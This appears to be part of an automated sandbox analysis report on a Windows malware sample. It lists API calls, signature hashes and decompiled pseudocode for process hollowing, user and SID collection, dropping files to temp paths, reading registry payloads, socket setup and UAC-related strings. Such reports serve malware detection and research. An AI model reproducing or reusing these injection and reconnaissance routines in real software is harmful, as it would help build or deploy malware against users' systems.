                                                                                0x00000000
                                                                                0x00409863
                                                                                0x004097f5
                                                                                0x004097f5
                                                                                0x00000000
                                                                                0x004097f5
                                                                                0x004097bb
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2981417381-1403908072
                                                                                • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02086778 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 020867C3
                                                                                • htonl.WS2_32(?), ref: 020867DF
                                                                                • htonl.WS2_32(?), ref: 020867EE
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 020868F1
                                                                                • ExitProcess.KERNEL32 ref: 020869BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Processhtonl$CurrentExitHugeRead
                                                                                • String ID: except_info$localcfg
                                                                                • API String ID: 1150517154-3605449297
                                                                                • Opcode ID: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction ID: 8d48a37e97df5aeacc8562e5290ccda38d559f7cb32ce2094811506da341a246
                                                                                • Opcode Fuzzy Hash: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction Fuzzy Hash: FE615E71A40308AFDB60AFB4DC45FEA77E9FB08300F148066FAADD2161EB7599909F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208F57C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • htons.WS2_32(0208CC84), ref: 0208F5B4
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0208F5CE
                                                                                • closesocket.WS2_32(00000000), ref: 0208F5DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction ID: f2fa2add3c1d964694db8bd94245ff0733faee41245f38ef13adea976e3f5593
                                                                                • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction Fuzzy Hash: EC315A72900219ABDB11AFB5DC889EF7BBCEB88350F104566FA45E3150E7708A919BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                0x00406f6c
                                                                                0x00406f77
                                                                                0x00406f82
                                                                                0x00000000
                                                                                0x00407047
                                                                                0x00406f88
                                                                                0x00406f8a
                                                                                0x00406f8d
                                                                                0x00406f8d
                                                                                0x00406f8f
                                                                                0x00406f90
                                                                                0x00406f96
                                                                                0x00406fb3
                                                                                0x00406fba
                                                                                0x00406fc9
                                                                                0x00407025
                                                                                0x0040703f
                                                                                0x00000000
                                                                                0x00407042
                                                                                0x00406fd6
                                                                                0x00406fdb
                                                                                0x00406fe3
                                                                                0x00406fe4
                                                                                0x00406fe7
                                                                                0x00406fe8
                                                                                0x00406fef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ff1
                                                                                0x00406ff4
                                                                                0x00406ff4
                                                                                0x00406ff7
                                                                                0x00406ff7
                                                                                0x00406ff9
                                                                                0x00406ffa
                                                                                0x00407000
                                                                                0x0040700e
                                                                                0x00407016
                                                                                0x00407019
                                                                                0x0040701f
                                                                                0x00000000

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                • wsprintfA.USER32 ref: 00407036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                • String ID: /%d$|
                                                                                • API String ID: 676856371-4124749705
                                                                                • Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                • Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02082F88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 02082FA1
                                                                                • LoadLibraryA.KERNEL32(?), ref: 02082FB1
                                                                                • GetProcAddress.KERNEL32(00000000,004103F0), ref: 02082FC8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02083000
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02083007
                                                                                • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02083032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: dnsapi.dll
                                                                                • API String ID: 1242400761-3175542204
                                                                                • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction ID: f3fc77bd00f95d34168370d4fc717fbddc257c3a9fb1d10f28fa8cc22fd05e79
                                                                                • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction Fuzzy Hash: 0B219271D00729BBCB22AB94DC48AEFBBB8EF48B14F004461F941E7141D7B49A81DBD4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406BA7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 43%
                                                                                			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                0x00406bab
                                                                                0x00406bba
                                                                                0x00406bc4
                                                                                0x00406bc7
                                                                                0x00406bd2
                                                                                0x00406be4
                                                                                0x00406be9
                                                                                0x00406c03
                                                                                0x00406c03
                                                                                0x00406beb
                                                                                0x00406bee
                                                                                0x00406bef
                                                                                0x00406bfa
                                                                                0x00406c1a
                                                                                0x00406c23
                                                                                0x00406c28
                                                                                0x00406c3e
                                                                                0x00406c44
                                                                                0x00406c47
                                                                                0x00406c5a
                                                                                0x00406c61
                                                                                0x00406c66
                                                                                0x00406c49
                                                                                0x00406c49
                                                                                0x00406c52
                                                                                0x00000000
                                                                                0x00406c52
                                                                                0x00406c2a
                                                                                0x00406c2a
                                                                                0x00406c2b
                                                                                0x00406c30
                                                                                0x00406c30
                                                                                0x00406bfc
                                                                                0x00406bfd
                                                                                0x00000000
                                                                                0x00406c02
                                                                                0x00406bfa
                                                                                0x00406bd4
                                                                                0x00406bd4
                                                                                0x00406bd4
                                                                                0x00406c6e
                                                                                0x00406bbc
                                                                                0x00406bbf
                                                                                0x00406bbf

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3609698214-2980165447
                                                                                • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02086F30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,02087043), ref: 02086F4E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02086F55
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02086F7B
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02086F92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\seokopfr
                                                                                • API String ID: 1082366364-3324671110
                                                                                • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction ID: c0bd8873821a63704d3387d6d9b9e99f63c7b9e3e795c2ef59342c5f425780fa
                                                                                • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction Fuzzy Hash: 902104617403407DF76373319C8CFFB2E8C8B52724F2840A5F984D6591DBD984D6966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 63%
                                                                                			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                0x0040907b
                                                                                0x00409088
                                                                                0x0040908e
                                                                                0x00409095
                                                                                0x0040909c
                                                                                0x004090a8
                                                                                0x004090b4
                                                                                0x004090c9
                                                                                0x004090ca
                                                                                0x004090e9
                                                                                0x004090f8
                                                                                0x00409114
                                                                                0x00409118
                                                                                0x00000000
                                                                                0x0040913f
                                                                                0x0040912d
                                                                                0x00409134
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                • wsprintfA.USER32 ref: 004090E9
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2439722600-2980165447
                                                                                • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020892CB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?), ref: 020892E2
                                                                                • wsprintfA.USER32 ref: 02089350
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02089375
                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 02089389
                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 02089394
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0208939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2439722600-2980165447
                                                                                • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction ID: 8cbabf148e6aa2465cd4a58c27dc0634c28c63623dd077f2c4927a69c44838fb
                                                                                • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction Fuzzy Hash: DB1172B27406247BE7207732EC0DFEF3A6EDBC8B11F008065BB49A5191EBB44A459B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020899E3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02089A18
                                                                                • GetThreadContext.KERNEL32(?,?), ref: 02089A52
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 02089A60
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02089A98
                                                                                • SetThreadContext.KERNEL32(?,00010002), ref: 02089AB5
                                                                                • ResumeThread.KERNEL32(?), ref: 02089AC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction ID: 17c4471a119d96f0040c32f6f5c15383d851344a2d2f07ced2f440c76a4e044b
                                                                                • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction Fuzzy Hash: EE216BB1A01219BBDB12ABA1DC08EEF7BBCEF04750F404061FA19E1150E7718A40DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02081C03 Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WS2_32(004102D8), ref: 02081C18
                                                                                • LoadLibraryA.KERNEL32(004102C8), ref: 02081C26
                                                                                • GetProcessHeap.KERNEL32 ref: 02081C84
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02081C9D
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02081CC1
                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 02081D02
                                                                                • FreeLibrary.KERNEL32(?), ref: 02081D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                • String ID:
                                                                                • API String ID: 2324436984-0
                                                                                • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction ID: 49cc952ca1260fe180e50dfde48c7bbb928e0981796092fa327e2b617c756526
                                                                                • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction Fuzzy Hash: 15315E32D00309BFCB52AFA4DC889AFFBF9EF45305B24447AE549A2110D7B54E81EB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E3CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4;
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}























                                                                                0x0040e3ca
                                                                                0x0040e3e0
                                                                                0x0040e3ee
                                                                                0x0040e528
                                                                                0x0040e52d
                                                                                0x0040e52d
                                                                                0x0040e3f4
                                                                                0x0040e3f9
                                                                                0x0040e3fb
                                                                                0x0040e3fb
                                                                                0x0040e3fe
                                                                                0x0040e3fe
                                                                                0x0040e400
                                                                                0x0040e401
                                                                                0x0040e407
                                                                                0x0040e409
                                                                                0x0040e40f
                                                                                0x0040e413
                                                                                0x0040e413
                                                                                0x0040e41c
                                                                                0x0040e421
                                                                                0x0040e429
                                                                                0x0040e42c
                                                                                0x0040e42f
                                                                                0x0040e43a
                                                                                0x0040e452
                                                                                0x0040e51d
                                                                                0x0040e520
                                                                                0x00000000
                                                                                0x0040e458
                                                                                0x0040e458
                                                                                0x0040e458
                                                                                0x0040e45b
                                                                                0x0040e463
                                                                                0x0040e469
                                                                                0x0040e46e
                                                                                0x0040e484
                                                                                0x0040e48a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e491
                                                                                0x0040e494
                                                                                0x0040e499
                                                                                0x0040e4a1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4a3
                                                                                0x0040e4a6
                                                                                0x0040e4a9
                                                                                0x0040e4ae
                                                                                0x0040e4b4
                                                                                0x0040e4b9
                                                                                0x0040e4d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4d5
                                                                                0x0040e4da
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4dc
                                                                                0x0040e4df
                                                                                0x0040e4e1
                                                                                0x0040e4e6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4e6
                                                                                0x0040e4e8
                                                                                0x0040e4ea
                                                                                0x0040e500
                                                                                0x0040e50e
                                                                                0x0040e516
                                                                                0x0040e516
                                                                                0x00000000
                                                                                0x0040e4ea

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1586453840-2980165447
